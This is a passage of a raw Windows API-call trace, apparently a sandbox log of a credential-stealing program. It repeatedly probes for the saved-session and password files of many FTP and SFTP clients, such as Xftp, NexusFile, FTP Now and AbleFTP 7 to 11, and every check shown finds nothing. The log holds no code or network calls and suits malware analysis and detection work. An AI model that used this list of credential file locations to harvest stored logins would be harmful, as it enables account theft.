[0113.953] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0113.954] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0113.954] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0113.954] GetProcessHeap () returned 0x5b0000 [0113.954] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f94) returned 0x5cb930 [0113.955] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.956] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Sherrod Computers\\sherrod FTP\\favorites", arglist=0xdfb94 | out: param_1="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 62 [0113.956] GetProcessHeap () returned 0x5b0000 [0113.956] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x80) returned 0x5caae8 [0113.956] GetProcessHeap () returned 0x5b0000 [0113.956] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0113.957] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.957] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Sherrod Computers\\sherrod FTP\\favorites") returned 0 [0113.958] GetProcessHeap () returned 0x5b0000 [0113.958] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0113.958] GetProcessHeap () returned 0x5b0000 [0113.958] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0113.958] GetProcessHeap () returned 0x5b0000 [0113.958] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0113.959] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0113.959] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0113.959] GetProcessHeap () returned 0x5b0000 [0113.959] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f68) returned 0x5cb930 [0113.960] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.961] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FTP Now\\sites.xml", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 40 [0113.961] GetProcessHeap () returned 0x5b0000 [0113.961] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x54) returned 0x5caae8 [0113.961] GetProcessHeap () returned 0x5b0000 [0113.961] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0113.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.962] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTP Now\\sites.xml") returned 0 [0113.962] GetProcessHeap () returned 0x5b0000 [0113.963] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0113.963] GetProcessHeap () returned 0x5b0000 [0113.963] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0113.963] GetProcessHeap () returned 0x5b0000 [0113.963] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0113.964] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0113.964] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0113.964] GetProcessHeap () returned 0x5b0000 [0113.964] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f82) returned 0x5cb930 [0113.965] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.966] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\NexusFile\\userdata\\ftpsite.ini", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 53 [0113.966] GetProcessHeap () returned 0x5b0000 [0113.966] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x6e) returned 0x5caae8 [0113.966] GetProcessHeap () returned 0x5b0000 [0113.966] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0113.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.990] PathFileExistsW (pszPath="C:\\Program Files (x86)\\NexusFile\\userdata\\ftpsite.ini") returned 0 [0113.990] GetProcessHeap () returned 0x5b0000 [0113.991] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0113.991] GetProcessHeap () returned 0x5b0000 [0113.991] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0113.991] GetProcessHeap () returned 0x5b0000 [0113.991] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f70) returned 0x5cb930 [0113.992] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.993] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\NexusFile\\ftpsite.ini", arglist=0xdfb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 59 [0113.993] GetProcessHeap () returned 0x5b0000 [0113.993] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7a) returned 0x5c9390 [0113.993] GetProcessHeap () returned 0x5b0000 [0113.994] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0113.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.995] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NexusFile\\ftpsite.ini") returned 0 [0113.995] GetProcessHeap () returned 0x5b0000 [0113.995] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0113.995] GetProcessHeap () returned 0x5b0000 [0113.995] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0113.996] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0113.997] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0113.997] GetProcessHeap () returned 0x5b0000 [0113.997] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f74) returned 0x5cb930 [0114.000] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.001] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0xdfb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 55 [0114.001] GetProcessHeap () returned 0x5b0000 [0114.001] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x72) returned 0x5c7210 [0114.002] GetProcessHeap () returned 0x5b0000 [0114.003] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.005] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\NetSarang\\Xftp\\Sessions") returned 0 [0114.006] GetProcessHeap () returned 0x5b0000 [0114.006] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.006] GetProcessHeap () returned 0x5b0000 [0114.006] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7210 | out: hHeap=0x5b0000) returned 1 [0114.006] GetProcessHeap () returned 0x5b0000 [0114.006] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.008] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.009] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0114.009] GetProcessHeap () returned 0x5b0000 [0114.009] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f74) returned 0x5cb930 [0114.010] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.011] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\NetSarang\\Xftp\\Sessions", arglist=0xdfb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 61 [0114.011] GetProcessHeap () returned 0x5b0000 [0114.011] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7e) returned 0x5caae8 [0114.011] GetProcessHeap () returned 0x5b0000 [0114.012] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.014] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\NetSarang\\Xftp\\Sessions") returned 0 [0114.014] GetProcessHeap () returned 0x5b0000 [0114.015] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.015] GetProcessHeap () returned 0x5b0000 [0114.015] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.067] GetProcessHeap () returned 0x5b0000 [0114.067] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.068] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.068] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0114.068] GetProcessHeap () returned 0x5b0000 [0114.068] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5cb930 [0114.069] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.070] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\EasyFTP\\data", arglist=0xdfb94 | out: param_1="C:\\Program Files (x86)\\EasyFTP\\data") returned 35 [0114.070] GetProcessHeap () returned 0x5b0000 [0114.070] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4a) returned 0x5caae8 [0114.070] GetProcessHeap () returned 0x5b0000 [0114.071] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.072] PathFileExistsW (pszPath="C:\\Program Files (x86)\\EasyFTP\\data") returned 0 [0114.072] GetProcessHeap () returned 0x5b0000 [0114.073] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.073] GetProcessHeap () returned 0x5b0000 [0114.073] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.073] GetProcessHeap () returned 0x5b0000 [0114.073] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5cb930 [0114.073] GetProcessHeap () returned 0x5b0000 [0114.073] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc2c0 [0114.073] GetProcessHeap () returned 0x5b0000 [0114.073] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0114.074] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0114.074] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0114.074] GetProcessHeap () returned 0x5b0000 [0114.075] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5cbd20 [0114.075] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.076] wvsprintfW (in: param_1=0x5cbd20, param_2="%s\\SftpNetDrive", arglist=0xdfb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 50 [0114.076] GetProcessHeap () returned 0x5b0000 [0114.076] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x68) returned 0x5caae8 [0114.076] GetProcessHeap () returned 0x5b0000 [0114.077] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbd20 | out: hHeap=0x5b0000) returned 1 [0114.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.078] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SftpNetDrive") returned 0 [0114.078] GetProcessHeap () returned 0x5b0000 [0114.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.079] GetProcessHeap () returned 0x5b0000 [0114.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0114.079] GetProcessHeap () returned 0x5b0000 [0114.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.079] GetProcessHeap () returned 0x5b0000 [0114.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc2c0 | out: hHeap=0x5b0000) returned 1 [0114.079] GetProcessHeap () returned 0x5b0000 [0114.080] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.080] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.081] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 42 [0114.084] GetProcessHeap () returned 0x5b0000 [0114.084] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5c9390 [0114.084] GetProcessHeap () returned 0x5b0000 [0114.084] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.085] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\encPwd.jsd") returned 0 [0114.086] GetProcessHeap () returned 0x5b0000 [0114.086] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.086] GetProcessHeap () returned 0x5b0000 [0114.086] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.087] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.088] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 63 [0114.088] GetProcessHeap () returned 0x5b0000 [0114.088] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.088] GetProcessHeap () returned 0x5b0000 [0114.088] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.089] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.089] GetProcessHeap () returned 0x5b0000 [0114.090] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.090] GetProcessHeap () returned 0x5b0000 [0114.090] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.091] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.092] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0114.092] GetProcessHeap () returned 0x5b0000 [0114.092] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.092] GetProcessHeap () returned 0x5b0000 [0114.092] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.093] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP7\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.093] GetProcessHeap () returned 0x5b0000 [0114.094] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.094] GetProcessHeap () returned 0x5b0000 [0114.094] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.094] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.095] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 42 [0114.095] GetProcessHeap () returned 0x5b0000 [0114.095] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5c9390 [0114.095] GetProcessHeap () returned 0x5b0000 [0114.096] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.096] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\encPwd.jsd") returned 0 [0114.097] GetProcessHeap () returned 0x5b0000 [0114.097] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.097] GetProcessHeap () returned 0x5b0000 [0114.097] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.099] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.099] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 63 [0114.099] GetProcessHeap () returned 0x5b0000 [0114.099] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.099] GetProcessHeap () returned 0x5b0000 [0114.100] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.101] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.101] GetProcessHeap () returned 0x5b0000 [0114.102] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.102] GetProcessHeap () returned 0x5b0000 [0114.102] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.102] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.103] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0114.103] GetProcessHeap () returned 0x5b0000 [0114.103] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.103] GetProcessHeap () returned 0x5b0000 [0114.104] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.105] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP8\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.105] GetProcessHeap () returned 0x5b0000 [0114.105] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.105] GetProcessHeap () returned 0x5b0000 [0114.105] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.106] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.107] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 42 [0114.107] GetProcessHeap () returned 0x5b0000 [0114.107] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5c9390 [0114.107] GetProcessHeap () returned 0x5b0000 [0114.107] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.108] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\encPwd.jsd") returned 0 [0114.108] GetProcessHeap () returned 0x5b0000 [0114.108] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.109] GetProcessHeap () returned 0x5b0000 [0114.109] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.109] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.110] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 63 [0114.110] GetProcessHeap () returned 0x5b0000 [0114.110] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.110] GetProcessHeap () returned 0x5b0000 [0114.110] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.111] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.111] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.111] GetProcessHeap () returned 0x5b0000 [0114.112] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.112] GetProcessHeap () returned 0x5b0000 [0114.112] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.113] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.162] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 63 [0114.162] GetProcessHeap () returned 0x5b0000 [0114.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x82) returned 0x5c9390 [0114.162] GetProcessHeap () returned 0x5b0000 [0114.163] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.164] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.164] GetProcessHeap () returned 0x5b0000 [0114.164] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.164] GetProcessHeap () returned 0x5b0000 [0114.164] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.165] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.166] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 43 [0114.166] GetProcessHeap () returned 0x5b0000 [0114.166] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c9390 [0114.166] GetProcessHeap () returned 0x5b0000 [0114.166] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.167] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\encPwd.jsd") returned 0 [0114.168] GetProcessHeap () returned 0x5b0000 [0114.168] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.168] GetProcessHeap () returned 0x5b0000 [0114.168] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.169] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.169] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 64 [0114.169] GetProcessHeap () returned 0x5b0000 [0114.169] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.169] GetProcessHeap () returned 0x5b0000 [0114.170] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.171] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0114.171] GetProcessHeap () returned 0x5b0000 [0114.171] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.171] GetProcessHeap () returned 0x5b0000 [0114.171] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f8e) returned 0x5cb930 [0114.172] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.173] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0114.173] GetProcessHeap () returned 0x5b0000 [0114.173] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x84) returned 0x5c9390 [0114.173] GetProcessHeap () returned 0x5b0000 [0114.173] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0114.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0114.174] PathFileExistsW (pszPath="C:\\Program Files (x86)\\AbleFTP10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0114.174] GetProcessHeap () returned 0x5b0000 [0114.174] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0114.175] GetProcessHeap () returned 0x5b0000 [0114.175] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f64) returned 0x5cb930 [0114.175] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0114.176] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\%s%i\\encPwd.jsd", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\AbleFTP11\\encPwd.jsd") returned 43 [0114.177] GetProcessHeap () returned 0x5b0000 [0114.177] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c9390 [0114.177] GetProcessHeap () returned 